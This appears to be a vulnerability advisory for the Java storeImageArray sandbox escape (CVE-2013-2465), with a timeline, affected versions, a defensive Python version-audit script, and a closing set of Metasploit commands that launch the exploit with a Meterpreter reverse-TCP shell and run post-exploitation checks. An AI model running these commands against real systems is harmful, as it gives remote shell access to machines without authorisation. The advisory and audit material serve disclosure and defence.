Timeline :
Vulnerability discovered and reported to Packet Storm by Name Withheld
Vulnerability corrected by vendor on 2013-06-18
PoC provided by Packet Storm on 2013-08-12
Metasploit PoC provided on 2013-08-19
PoC provided by :
Name Withheld
sinn3r
juan vazquez
Reference(s) :
CVE-2013-2465
OSVDB-96269
Packet Storm Exploit 2013-0811-1
Oracle Java SE Critical Patch Update Advisory – June 2013
Affected version(s) :
Oracle Java SE 7 Update 21 and before
Oracle Java SE 6 Update 45 and before
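A version check for the affected releases listed above, as an added example that is not part of the original advisory or of the Metasploit module. The host names and version strings in the inventory are constructed sample data, and the function names are hypothetical.

```python
import re

# Last affected update per Java family, from the "Affected version(s)" list above.
LAST_AFFECTED_UPDATE = {7: 21, 6: 45}

# Matches legacy version strings such as "1.7.0_17", "1.6.0_45-b06" or "1.7.0".
_VERSION_RE = re.compile(r'\b1\.(\d+)\.\d+(?:_(\d+))?')

def parse_java_version(text):
    """Return (family, update) from a `java -version` line or bare string, else None."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    # A missing "_NN" suffix means the initial release of the family (update 0).
    return int(m.group(1)), int(m.group(2) or 0)

def is_affected(text):
    """True/False for Java 6 and 7; None if unparseable or the family is not listed above."""
    parsed = parse_java_version(text)
    if parsed is None:
        return None
    family, update = parsed
    last = LAST_AFFECTED_UPDATE.get(family)
    if last is None:
        return None
    return update <= last

def audit(inventory):
    """Map each host to 'AFFECTED', 'not affected' or 'unknown'."""
    labels = {True: "AFFECTED", False: "not affected", None: "unknown"}
    return {host: labels[is_affected(version)] for host, version in inventory.items()}

# Constructed sample inventory (host -> reported Java version string).
SAMPLE_INVENTORY = {
    "ws-001": 'java version "1.7.0_17"',
    "ws-002": 'java version "1.7.0_25"',
    "ws-003": "1.6.0_45-b06",
    "ws-004": "1.6.0_51",
    "ws-005": "version string missing",
}

if __name__ == "__main__":
    for host, status in sorted(audit(SAMPLE_INVENTORY).items()):
        print(f"{host}: {status}")
```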
Tested on Windows XP Pro SP3 with :
Java SE 7 Update 17
Description :
This module abuses an invalid array indexing vulnerability in the static storeImageArray() function to cause memory corruption and escape the Java sandbox. The vulnerability affects Java version 7u21 and earlier. The module, which doesn’t bypass click2play, has been tested successfully on Java 7u21 on Windows and Linux systems.
Commands :
use exploit/multi/browser/java_storeimagearray
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit
sysinfo
getuid